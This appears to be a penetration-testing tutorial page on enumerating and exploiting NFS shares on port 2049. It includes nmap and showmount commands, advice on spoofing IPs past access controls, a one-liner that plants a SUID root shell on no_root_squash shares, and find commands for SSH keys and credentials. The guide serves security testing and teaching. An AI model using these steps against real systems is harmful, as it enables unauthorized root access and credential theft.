NFS Service - Port 2049
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
πΊ YouTube @VeryLazyTech.
π© Telegram @VeryLazyTech.
π΅οΈββοΈ My Site @VeryLazyTech.
Visit our shop for e-books and courses. π
Basic info
The Network File System (NFS) allows file sharing across Unix-like systems over a network. While convenient, NFS often exposes sensitive data and trust relationships due to misconfigurations or outdated security models. This guide delivers in-depth methods for discovering, analyzing, and exploiting NFS services during penetration testing engagements.
Identifying NFS Services During Network Reconnaissance
Port Scanning and Service Enumeration
NFS uses the following ports:
TCP/UDP 2049 β NFS Service
TCP/UDP 111 β Portmapper (rpcbind)
Run a detailed Nmap scan:
nmap -sV -sT -p 111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <target-ip>
Check for exposed mount points and exports.
Enumerating NFS Exports
Using showmount
showmount
Check accessible NFS shares:
showmount -e <target-ip>
Example output:
Export list for 10.0.0.1:
/home *
/var/nfs 192.168.0.0/24
*
means accessible from any hostCIDR indicates trusted networks
Bypassing IP-based Access Controls
Use spoofed IP addresses or proxy from allowed subnets. In some cases, a misconfigured DNS resolution can allow access even if IP-based restrictions are in place.
Mounting NFS Shares and Privilege Analysis
Mounting an Export Locally
mkdir /mnt/nfs
mount -t nfs <target-ip>:/home /mnt/nfs
Check for files with improper permissions or user credentials.
UID/GID Mappings and Root Squashing
By default, NFS applies root squashing: remote root becomes nfsnobody
. Check /etc/exports
configuration for no_root_squash
option:
/home *(rw,sync,no_root_squash)
If no_root_squash
is set, root access is preserved, allowing privilege escalation.
Exploiting no_root_squash for Remote Code Execution
Step-by-Step Attack
Create a SUID Binary on Mounted Share
echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nint main(){setuid(0); system("/bin/bash");}' > rootsh.c gcc rootsh.c -o rootsh chmod +s rootsh mv rootsh /mnt/nfs/
Trigger Execution on Target If the NFS share is mounted by a target system, wait for the binary to sync and then trigger execution through a scheduled task or user login.
Gain Shell with Root Privileges
Enumerating and Extracting Sensitive Files
Commands to Discover Valuable Files
find /mnt/nfs -type f -name "*.conf"
find /mnt/nfs -type f -name "*.pem"
find /mnt/nfs -type f -perm -4000
Look for:
SSH private keys
Database credentials
Password backup files
Misconfigured
.bashrc
,.profile
, or crontabs
Learn & practice For the Bug Bounty
Last updated
Was this helpful?